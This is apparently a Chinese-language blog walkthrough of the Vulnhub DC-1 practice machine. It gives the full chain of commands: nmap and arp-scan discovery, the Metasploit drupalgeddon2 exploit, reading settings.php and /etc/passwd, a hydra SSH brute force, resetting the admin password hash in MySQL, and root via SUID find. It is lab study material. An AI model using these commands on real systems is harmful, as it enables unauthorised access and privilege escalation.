Vulnhub DC-1靶机渗透学习

准备

下载地址中下载DC-1综合渗透靶机,用VMware即可打开,打开时忽略错误,将靶机调成NAT模式即可。

信息收集

打开靶机

发现需要登录账号和密码。
用kali进行对局域网的信息收集,将DC-1靶机的ip地址找到。
有两个工具可以使用:
1.arp-scan

1
arp-scan -l

扫描到如上ip地址
2.nmap

1
nmap -sn 192.168.1.0/24

经过测试发现到靶机ip:192.168.1.154

第二步对该ip进行端口扫描工作,使用namp。

1
nmap -sS 192.168.1.154

使用SYN扫描对其进行端口扫描。

发现80和22端口开放。
访问这个靶机,发现一个网页。

漏洞利用

使用Wappalyzer插件 知道这个网页是drupal cms

然后寻找这个cms对应的漏洞,可以使用msf进行查找。

1
2
msfconsole -q
search Drupal

找到如上漏洞。
使用编号为4的漏洞,可以获得一个低权限的shell。

1
2
3
4
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.1.154
exploit

查看文件目录,找到flag1.txt。

根据这个意思说明我们需要找到这个cms对应的配置文件。
Google搜索一下:
https://blog.csdn.net/yaojuns/article/details/38084627

1
cat sites/default/settings.php

看到用mysql数据库的用户名和密码,但是无法web端登录,想到通过shell进行。
但是不能直接使用msf弹的shell进行,因为权限太低。
先cat /etc/passwd

发现一个flag4的用户名,想到前面的端口扫描,这个靶机也开放了22端口。
那么我们可以进行22端口的暴力破解。

1
hydra -l flag4 -P /usr/share/wordlists/dirb/big.txt ssh://192.168.1.154

找到密码为:orange
使用ssh进行连接:

成功进入,然后进入mysql数据库中进行查看。

我们发现有个admin账号,但是密码被加密了。
Google搜索drupal密码重置。

1
2
update users set 
pass="$S$DRIG34Wb.GK3EKVBYBYN6rO.uyMkf1re4u8f/FjDRmGBRY30x3S4" where name="admin";

成功修改密码,进入admin账号界面。

提权

这个意思是使用find进行提权,找到root目录下的flag文件。
具体参考:SUID提权
SUID提权简单说就是:当我们运行某个文件或者工具时,就会让我们暂时拥有文件拥有者的身份运行。
首先通过find命令查看所有SUID为root的可执行文件。

1
2
3
4
#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

我们可以查看一下:

1
ls -ls /usr/bin/find
1
find . -exec "/bin/sh" \;

上面的意思是查找所有文件 然后执行/bin/sh 用户转换。

最终获取最后的flag文件

总结

将DC-1靶机打通之后,学到了很多。
1.msf的基本使用,以前没怎么接触msf,现在准备好好学习一下。
2.nmap端口扫描原理。
3.SUID提权,提权以前一点都没有接触到,通过打靶机学习到了一个知识点。

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×